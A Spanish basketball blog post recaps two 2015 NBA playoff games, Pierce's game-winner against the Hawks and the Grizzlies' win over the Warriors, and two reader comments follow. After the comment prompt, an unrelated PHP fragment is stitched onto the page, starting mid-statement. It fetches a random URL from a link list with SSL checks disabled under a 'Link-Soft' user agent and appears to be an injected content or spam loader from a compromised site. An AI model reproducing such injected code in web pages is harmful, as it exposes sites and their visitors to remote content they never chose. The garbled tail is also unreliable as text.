La crónica: Lucky boy

10 de May de 2015 por TheDeerHunter

Dennis Schröder on Pierce’s game-winner: “It was a lucky shot and we lost the game.”

Pierce on Schröder saying the shot was lucky: “Of course Schroder is going to say I’m lucky, he’s probably too young to have seen the last 17 years of it … He probably missed with me in 2K.”

Los dos mejores equipos de la regular al borde del desastre. En Washington la baja de Wall quedó atenuada con un Millsap muy mermado por la fiebre. Los Hawks fueron barridos durante tres cuartos pero aún fueron capaces de igualar una desventaja de 21 puntos. Llegados al punto de jugarse las habichuelas en una última bola para desempatar la gran verdad es que no hay muchos mejores que Paul Pierce.

En Memphis los Warriors se estamparon contra el muro de las lamentaciones que son los Grizzlies.

Hawks 101 – Wizards 103

Habrá que empezar a conceder su parte de crédito a los Wizards. Quien pensara que la lesión de John Wall era el final de este equipo anoche se llevó una inmensa sorpresa. Ramon Sessions y Will Bynum lograron suplir con dignidad al arquitecto all-star del equipo y, además, Nene&Gortat se impusieron a Horford&Antic, con Millsap afectado por fiebre. Durante los tres primeros cuartos los sistemas defensivos del Coach of the Year fueron un coladero. Muy ilustrativo que un equipo con las limitaciones ofensivas que tienen unos Wizards sin Wall anoten casi 30 puntos por cuarto.
A los Hawks les vimos tremendamente cansados. La fluidez que ha marcado su juego durante esta campaña no se llegó a ver por ningún lado durante la mayor parte del choque. 21 abajo echaron mano de la casta que se les presupone, aunque para alcanzar una final de la NBA hace falta mucho más que eso. De la mano del gran partido de Jeff Teague y Dennis Schroder los Hawks lograron enjugar la desventaja en el último cuarto, pero no fue suficiente para culminar. Esa remontada hubiera supuesto un golpe moral casi significativo para sus rivales.
Para este tipo de cosas se fichó a Paul Pierce, al que no se le podrá pedir una temporada regular al máximo de intensidad, pero tiene talento nivel maestro. Uno de los más grandes de esos últimos 17 años que él mencionaba. Lo demostró, con el punto de suerte de los campeones.

Seguimos pensando que los Hawks son favoritos de largo a pesar de verse remando en contra, pero ahora toca comenzar a demostrarlo.

Warriors 89 – Grizzlies 99

Los que somos muy fans del concepto colectivo de los Grizzlies no nos podíamos creer el atasco que les montaron a los Splash Bross y compañía. Habría que ver en cuantos partidos de esta temporada los Warriors se han quedado por debajo de los 40 puntos durante toda una primera parte (y de manera consecutiva como así ha ocurrido). El partido soñado de Joerger, donde todo pareció salir como los Grizzlies debían plantearlo: 46 a 32 puntos en la pintura, 44 a 39 rebotes, 17 pérdidas forzadas (16 robos de Tony Allen en los últimos 4 partidos) para 22 puntos fáciles al contragolpe. Primera parte fabulosa de Marc y Zach imparable en la segunda. El resto sencillamente impecables. Si en algo los Grizzlies le pueden hincar el diente a un equipo superior como los Warriors es en carácter y en experiencia. Ayer, al menos, se pudo ver que no hay color entre estos dos equipos atendiendo a estos factores.

Los Warriors volvieron a tirar de épica para tratar de sorprender con otra remontada en el último cuarto. Ya advertimos en su día que este rival tiene muy poco que ver mentalmente con los Pelicans.

“We understand what our strengths are, and of course at the end of games we’re not going to panic” Marc Gasol

Es muy difícil poner nervioso a este equipo. Los Grizzlies supieron administrar su ventaja y se ponen con ventaja, no sólo en el marcador de la eliminatoria sino en las sensaciones. La eliminatoria ha entrado en el terreno donde ellos se sienten cómodos y eso es muy peligroso para los Warriors, quienes por cierto pueden perder a Speights para alguno de sus próximos compromisos.

Comenta

2 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    La verdad es que Paul Pierce se está erigiendo como protagonista principal de la película de los PO,primero coronándose “King in the North” en Toronto y ahora con este game-winner y declaraciones de genio absoluto.

      Citar

  2. rumbero dice:
    #2

    Pues no se que opinará Schroeder de la que acaba de meter Lebron para ganar:D Partido malo pero con tremendo final.
    Que esperpento de equipo son los Bulls por momentos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>